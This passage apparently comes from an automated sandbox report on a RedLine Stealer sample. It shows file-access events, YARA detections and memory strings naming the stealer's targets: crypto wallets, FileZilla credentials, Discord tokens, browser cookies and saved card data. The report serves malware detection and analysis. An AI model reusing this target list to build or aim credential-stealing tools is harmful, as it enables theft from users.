                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Users\user\AppData\Roaming\svhost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Users\user\AppData\Roaming\svhost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: powershell.exe, 00000000.00000002.385692015.00007FF8165D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                    Source: Yara matchFile source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE
